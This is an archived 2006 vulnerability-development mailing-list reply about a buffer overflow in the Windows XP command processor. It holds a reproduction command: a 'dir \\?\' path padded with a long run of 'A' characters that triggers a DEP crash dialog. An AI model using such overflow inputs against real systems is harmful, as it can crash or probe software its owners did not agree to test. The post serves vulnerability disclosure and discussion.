<a href="http://g.adspeed.net/ad.php?do=clk&zid=14678&wd=728&ht=90&pair=as" target="_top"><img style="border:0px;" src="http://g.adspeed.net/ad.php?do=img&zid=14678&wd=728&ht=90&pair=as" alt="i" width="728" height="90"/></a>

Nmap Security Scanner

Docs
Security Lists

Full Disclosure

More
Security Tools

Packet crafters

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

edgeos

Vulnerability Development: RE: Windows Command Processor CMD.EXE Buffer Overflow

RE: Windows Command Processor CMD.EXE Buffer Overflow

From: Marvin Simkin <Marvin.Simkin_at_asu.edu>
Date: Mon, 23 Oct 2006 08:05:29 -0700

> just for clarifying if you executed the command properly -- "\\?\" is required after dir cmd.. and not one with the single slash "\?\". to reproduce the issue in winxp sp2,

Sorry, one of the backslashes got lost somehow in copy and paste. With two backslashes it works as advertised and I get the DEP dialog.

C:\>cmd
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>%COMSPEC% /K "dir \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

[DEP dialog here]

C:\>
Received on Oct 23 2006

This message: [ Message body ]
Next message: Bernardo Wernesback: "Re: Windows Command Processor CMD.EXE Buffer Overflow"
Previous message: Danux: "Re: Windows Command Processor CMD.EXE Buffer Overflow"
In reply to: gregory_panakkal: "RE: Windows Command Processor CMD.EXE Buffer Overflow"
Next in thread: RockyH: "RE: Windows Command Processor CMD.EXE Buffer Overflow"

Contemporary messages sorted: [ by date ] [ by thread ] [ by subject ] [ by author ] [ by messages with attachments ]

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]

edgeos